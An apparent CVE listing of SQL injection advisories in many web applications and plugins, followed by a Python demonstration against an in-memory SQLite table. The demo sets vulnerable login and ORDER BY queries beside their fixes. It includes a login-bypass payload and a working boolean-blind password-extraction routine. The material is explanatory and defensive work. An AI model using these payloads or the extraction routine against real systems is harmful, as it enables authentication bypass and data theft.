Total: 8599 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2024-0475 | | | 2024-01-13 | N/A | N/A |
| A vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580. | |||||
| CVE-2024-0474 | | | 2024-01-12 | N/A | N/A |
| A vulnerability classified as critical was found in code-projects Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250579. | |||||
| CVE-2024-0473 | | | 2024-01-12 | N/A | N/A |
| A vulnerability classified as critical has been found in code-projects Dormitory Management System 1.0. Affected is an unknown function of the file comment.php. The manipulation of the argument com leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250578 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0470 | | | 2024-01-12 | N/A | N/A |
| A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been classified as critical. This affects an unknown part of the file /admin_route/inc_service_credits.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250575. | |||||
| CVE-2024-0469 | | | 2024-01-12 | N/A | N/A |
| A vulnerability was found in code-projects Human Resource Integrated System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update_personal_info.php. The manipulation of the argument sex leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250574 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0471 | | | 2024-01-12 | N/A | N/A |
| A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin_route/dec_service_credits.php. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250576. | |||||
| CVE-2024-0463 | | | 2024-01-12 | N/A | N/A |
| A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /production/admin_view_info.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250568. | |||||
| CVE-2024-0462 | | | 2024-01-12 | N/A | N/A |
| A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567. | |||||
| CVE-2024-0464 | | | 2024-01-12 | N/A | N/A |
| A vulnerability classified as critical has been found in code-projects Online Faculty Clearance 1.0. This affects an unknown part of the file delete_faculty.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250569 was assigned to this vulnerability. | |||||
| CVE-2024-0466 | | | 2024-01-12 | N/A | N/A |
| A vulnerability, which was classified as critical, has been found in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file file_table.php. The manipulation of the argument per_id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250571. | |||||
| CVE-2023-39336 | 1 Ivanti | 1 Endpoint Manager | 2024-01-12 | N/A | 8.8 HIGH |
| An unspecified SQL Injection vulnerability in Ivanti Endpoint Manager released prior to 2022 SU 5 allows an attacker with access to the internal network to execute arbitrary SQL queries and retrieve output without the need for authentication. Under specific circumstances, this may also lead to RCE on the core server. | |||||
| CVE-2024-0461 | | | 2024-01-12 | N/A | N/A |
| A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been classified as critical. Affected is an unknown function of the file deactivate.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250566 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-52142 | 1 Coolplugins | 1 Events Shortcodes For The Events Calendar | 2024-01-12 | N/A | 8.8 HIGH |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cool Plugins Events Shortcodes For The Events Calendar. This issue affects Events Shortcodes For The Events Calendar: from n/a through 2.3.1. | |||||
| CVE-2024-0459 | | | 2024-01-12 | N/A | N/A |
| A vulnerability has been found in Blood Bank & Donor Management 5.6 and classified as critical. This vulnerability affects unknown code of the file /admin/request-received-bydonar.php. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250564. | |||||
| CVE-2024-0460 | | | 2024-01-12 | N/A | N/A |
| A vulnerability was found in code-projects Faculty Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/student-print.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250565 was assigned to this vulnerability. | |||||
| CVE-2024-0355 | 1 Phpgurukul | 1 Dairy Farm Shop Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability, which was classified as critical, was found in PHPGurukul Dairy Farm Shop Management System up to 1.1. Affected is an unknown function of the file add-category.php. The manipulation of the argument category leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250122 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0359 | 1 Code-projects | 1 Simple Online Hotel Reservation System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability was found in code-projects Simple Online Hotel Reservation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250126 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0361 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical has been found in PHPGurukul Hospital Management System 1.0. Affected is an unknown function of the file admin/contact.php. The manipulation of the argument mobnum leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250128. | |||||
| CVE-2024-0362 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical was found in PHPGurukul Hospital Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/change-password.php. The manipulation of the argument cpass leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250129 was assigned to this vulnerability. | |||||
| CVE-2024-0360 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability was found in PHPGurukul Hospital Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/edit-doctor-specialization.php. The manipulation of the argument doctorspecilization leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250127. | |||||
| CVE-2024-0363 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the file admin/patient-search.php. The manipulation of the argument searchdata leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250130 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0364 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability, which was classified as critical, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file admin/query-details.php. The manipulation of the argument adminremark leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250131. | |||||
| CVE-2024-22196 | | | 2024-01-12 | N/A | N/A |
| Nginx-UI provides online statistics for server indicators, monitoring CPU usage, memory usage, load average, and disk usage in real time. This issue may lead to information disclosure. By using `DefaultQuery`, the `"desc"` and `"id"` values are used as defaults if the query parameters are not set; thus the `order` and `sort_by` query parameters are user-controlled and are appended to the `order` variable without any sanitization. This issue has been patched in version 2.0.0.beta.9. | |||||
| CVE-2022-4961 | | | 2024-01-12 | N/A | N/A |
| A vulnerability was found in Weitong Mall 1.0.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file platform-shop\src\main\resources\com\platform\dao\OrderDao.xml. The manipulation of the argument sidx/order leads to sql injection. The associated identifier of this vulnerability is VDB-250243. | |||||
| CVE-2024-0426 | | | 2024-01-12 | N/A | N/A |
| A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. This issue affects some unknown processing of the file admin/cms_template.php. The manipulation of the argument t_name/t_path leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250445 was assigned to this vulnerability. | |||||
| CVE-2023-26440 | 1 Open-xchange | 1 Open-xchange Appsuite Office | 2024-01-12 | N/A | 7.8 HIGH |
| The cacheservice API could be abused to indirectly inject parameters with SQL syntax which was insufficiently sanitized and would later be executed when creating new cache groups. Attackers with access to a local or restricted network could perform arbitrary SQL queries. We have improved the input check for API calls and filter for potentially malicious content. No publicly available exploits are known. | |||||
| CVE-2023-26443 | 1 Open-xchange | 1 Open-xchange Appsuite Backend | 2024-01-12 | N/A | 9.8 CRITICAL |
| Full-text autocomplete search allows user-provided SQL syntax to be injected to SQL statements. With existing sanitization in place, this can be abused to trigger benign SQL Exceptions but could potentially be escalated to a malicious SQL injection vulnerability. We now properly encode single quotes for SQL FULLTEXT queries. No publicly available exploits are known. | |||||
| CVE-2023-26454 | 1 Open-xchange | 1 Open-xchange Appsuite | 2024-01-12 | N/A | 8.8 HIGH |
| Requests to fetch image metadata could be abused to include SQL queries that would be executed unchecked. Exploiting this vulnerability requires at least access to adjacent networks of the imageconverter service, which is not exposed to public networks by default. Arbitrary SQL statements could be executed in the context of the service's database user account. API requests are now properly checked for valid content and attempts to circumvent this check are logged as errors. No publicly available exploits are known. | |||||
| CVE-2023-26439 | 1 Open-xchange | 1 Open-xchange Appsuite Office | 2024-01-12 | N/A | 7.8 HIGH |
| The cacheservice API could be abused to inject parameters with SQL syntax which was insufficiently sanitized before being executed as an SQL statement. Attackers with access to a local or restricted network were able to perform arbitrary SQL queries, discovering other users' cached data. We have improved the input check for API calls and filter for potentially malicious content. No publicly available exploits are known. | |||||
| CVE-2023-26452 | 1 Open-xchange | 1 Open-xchange Appsuite | 2024-01-12 | N/A | 8.8 HIGH |
| Requests to cache an image and return its metadata could be abused to include SQL queries that would be executed unchecked. Exploiting this vulnerability requires at least access to adjacent networks of the imageconverter service, which is not exposed to public networks by default. Arbitrary SQL statements could be executed in the context of the service's database user account. API requests are now properly checked for valid content and attempts to circumvent this check are logged as errors. No publicly available exploits are known. | |||||
| CVE-2023-29047 | 1 Open-xchange | 1 Open-xchange Appsuite | 2024-01-12 | N/A | 7.3 HIGH |
| Imageconverter API endpoints provided methods that were not sufficiently validating and sanitizing client input, allowing injection of arbitrary SQL statements. An attacker with access to the adjacent network and potentially API credentials could read and modify database content which is accessible to the imageconverter SQL user account. No publicly available exploits are known. | |||||
| CVE-2023-26453 | 1 Open-xchange | 1 Open-xchange Appsuite | 2024-01-12 | N/A | 8.8 HIGH |
| Requests to cache an image could be abused to include SQL queries that would be executed unchecked. Exploiting this vulnerability requires at least access to adjacent networks of the imageconverter service, which is not exposed to public networks by default. Arbitrary SQL statements could be executed in the context of the service's database user account. API requests are now properly checked for valid content and attempts to circumvent this check are logged as errors. No publicly available exploits are known. | |||||
| CVE-2024-0306 | 1 Lopalopa | 1 Dynamic Lab Management System | 2024-01-11 | N/A | 7.5 HIGH |
| A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been classified as critical. This affects an unknown part of the file /admin/admin_login_process.php. The manipulation of the argument admin_password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249873 was assigned to this vulnerability. | |||||
| CVE-2024-0307 | 1 Lopalopa | 1 Dynamic Lab Management System | 2024-01-11 | N/A | 7.5 HIGH |
| A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login_process.php. The manipulation of the argument password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249874 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-6921 | 1 Prestashow | 1 Google Integrator | 2024-01-11 | N/A | 9.1 CRITICAL |
| Blind SQL Injection vulnerability in PrestaShow Google Integrator (PrestaShop addon) allows for data extraction and modification. This attack is possible via command insertion in one of the cookies. | |||||
| CVE-2023-52201 | 1 Briandgoad | 1 Ptypeconverter | 2024-01-11 | N/A | 8.8 HIGH |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Brian D. Goad pTypeConverter. This issue affects pTypeConverter: from n/a through 0.2.8.1. | |||||
| CVE-2023-50162 | 1 Phome | 1 Empirecms | 2024-01-11 | N/A | 7.2 HIGH |
| SQL injection vulnerability in EmpireCMS v7.5, allows remote attackers to execute arbitrary code and obtain sensitive information via the DoExecSql function. | |||||
| CVE-2023-52204 | 1 Javik | 1 Randomize | 2024-01-11 | N/A | 8.8 HIGH |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Javik Randomize. This issue affects Randomize: from n/a through 1.4.3. | |||||
| CVE-2024-0301 | 1 Fhs-opensource | 1 Iparking | 2024-01-11 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical was found in fhs-opensource iparking 1.5.22.RELEASE. This vulnerability affects the function getData of the file src/main/java/com/xhb/pay/action/PayTempOrderAction.java. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249868. | |||||
| CVE-2024-21747 | 1 Wedevs | 1 Wp Erp | 2024-01-11 | N/A | 4.9 MEDIUM |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs WP ERP \| Complete HR solution with recruitment & job listings \| WooCommerce CRM & Accounting. This issue affects WP ERP \| Complete HR solution with recruitment & job listings \| WooCommerce CRM & Accounting: from n/a through 1.12.8. | |||||
| CVE-2023-52215 | 1 Ukrsolution | 1 Simple Inventory Management | 2024-01-11 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in UkrSolution Simple Inventory Management – just scan barcode to manage products and orders. For WooCommerce. This issue affects Simple Inventory Management – just scan barcode to manage products and orders. For WooCommerce: from n/a through 1.5.1. | |||||
| CVE-2023-46953 | 1 Abocms | 1 Abo.cms | 2024-01-11 | N/A | 9.8 CRITICAL |
| SQL Injection vulnerability in ABO.CMS v.5.9.3, allows remote attackers to execute arbitrary code via the d parameter in the Documents module. | |||||
| CVE-2024-0267 | 1 Surajghosh | 1 Hospital Management System | 2024-01-11 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical was found in Kashipara Hospital Management System up to 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component Parameter Handler. The manipulation of the argument email/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249823. | |||||
| CVE-2024-0268 | 1 Surajghosh | 1 Hospital Management System | 2024-01-11 | N/A | 9.8 CRITICAL |
| A vulnerability, which was classified as critical, has been found in Kashipara Hospital Management System up to 1.0. Affected by this issue is some unknown functionality of the file registration.php. The manipulation of the argument name/email/pass/gender/age/city leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249824. | |||||
| CVE-2024-0247 | 1 Online Food Ordering System Project | 1 Online Food Ordering System | 2024-01-11 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical was found in CodeAstro Online Food Ordering System 1.0. This vulnerability affects unknown code of the file /admin/ of the component Admin Panel. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249778 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-39853 | 1 Dzzoffice | 1 Dzzoffice | 2024-01-11 | N/A | 6.5 MEDIUM |
| SQL Injection vulnerability in Dzzoffice version 2.01, allows remote attackers to obtain sensitive information via the doobj and doevent parameters in the Network Disk backend module. | |||||
| CVE-2023-50027 | 1 Buy-addons | 1 Bazoom Magnifier | 2024-01-11 | N/A | 9.8 CRITICAL |
| SQL Injection vulnerability in Buy Addons baproductzoommagnifier module for PrestaShop versions 1.0.16 and before, allows remote attackers to escalate privileges and gain sensitive information via BaproductzoommagnifierZoomModuleFrontController::run() method. | |||||
| CVE-2022-2718 | 1 Beardev | 1 Joomsport | 2024-01-11 | N/A | 4.9 MEDIUM |
| The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter on the joomsport-page-extrafields page in versions up to, and including, 5.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrative privileges, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | |||||
| CVE-2022-2717 | 1 Beardev | 1 Joomsport | 2024-01-11 | N/A | 4.9 MEDIUM |
| The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter on the joomsport-events-form page in versions up to, and including, 5.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrative privileges, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | |||||
| CVE-2024-0389 | | | 2024-01-10 | N/A | N/A |
| A vulnerability, which was classified as critical, was found in SourceCodester Student Attendance System 1.0. Affected is an unknown function of the file attendance_report.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250230 is the identifier assigned to this vulnerability. | |||||
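
Two injection shapes account for most of the entries above: a string-built WHERE clause in a login handler (CVE-2024-0474, CVE-2024-0359, CVE-2024-0306, CVE-2024-0267, CVE-2024-0247) and a sort column or direction concatenated into ORDER BY (CVE-2024-22196, CVE-2022-4961, CVE-2022-2718, CVE-2022-2717). The following is an added example, not code from any project in the listing, that shows both against an in-memory SQLite database: the vulnerable query beside its fix, and a boolean-blind extraction that works through the ORDER BY flaw alone. The `users` table, its columns, the sample rows and all function names are assumptions made for the demonstration, and SQLite stands in for whatever database the real applications use.

```python
import sqlite3

# Constructed sample data for the demonstration; not taken from any listed application.
SAMPLE_USERS = [
    ("zed", "correct-horse", "user"),
    ("admin", "s3cret", "admin"),
    ("alice", "wonderland", "user"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in (assumption) for the backend of a listed web app."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)", SAMPLE_USERS
    )
    return conn


# Pattern 1: WHERE-clause injection through login fields (the login.php entries above).

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """String-built query: the caller controls SQL syntax, not just values."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_fixed(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: values are bound by the driver, so quotes stay data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Pattern 2: ORDER BY injection through sort parameters (sort_by/order, orderby, sidx/order).

ALLOWED_SORT_COLUMNS = {"id", "username", "role"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def list_users_vulnerable(conn: sqlite3.Connection, sort_by: str = "id", order: str = "desc"):
    """Placeholders cannot bind identifiers or keywords, so column and direction get
    concatenated: the mistake described for the `order` variable in CVE-2024-22196."""
    sql = f"SELECT username FROM users ORDER BY {sort_by} {order}"
    return [row[0] for row in conn.execute(sql)]


def list_users_fixed(conn: sqlite3.Connection, sort_by: str = "id", order: str = "desc"):
    """Allow-list the identifier and the keyword; anything else never reaches the SQL."""
    if sort_by not in ALLOWED_SORT_COLUMNS or order.lower() not in ALLOWED_DIRECTIONS:
        raise ValueError("invalid sort parameter")
    sql = f"SELECT username FROM users ORDER BY {sort_by} {order.lower()}"
    return [row[0] for row in conn.execute(sql)]


def recover_admin_password(conn: sqlite3.Connection,
                           charset: str = "abcdefghijklmnopqrstuvwxyz0123456789",
                           max_len: int = 16) -> str:
    """Boolean-blind extraction through the vulnerable sort parameter.

    The row order is the oracle: a CASE expression sorts by id when the guessed
    prefix is right and by username when it is wrong, and the two orders differ.
    No error text and no extra column are needed, which is why an ORDER BY
    injection is exploitable even when the query itself returns nothing secret."""
    id_order = list_users_vulnerable(conn, "id", "desc")
    known = ""
    for _ in range(max_len):
        for ch in charset:
            guess = known + ch
            payload = (
                "(CASE WHEN (SELECT password FROM users WHERE username = 'admin') "
                f"LIKE '{guess}%' THEN id ELSE username END)"
            )
            if list_users_vulnerable(conn, payload, "desc") == id_order:
                known = guess
                break
        else:
            break  # no character extends the prefix: the whole value is recovered
    return known


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, "admin' -- ", "wrong"))  # ('admin', 'admin')
    print("fixed: ", login_fixed(db, "admin' -- ", "wrong"))       # None
    print("leaked:", recover_admin_password(db))                    # s3cret
```

The fix for the two patterns is different, which is the point of showing them together: bound parameters close the login hole outright, but `ORDER BY ?` is not valid SQL in any mainstream driver, so a sort column or direction taken from the request has to be checked against a fixed set of names before concatenation. Escaping alone (the weakness named in the JoomSport entries) does not help here, because no quote is being broken out of.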
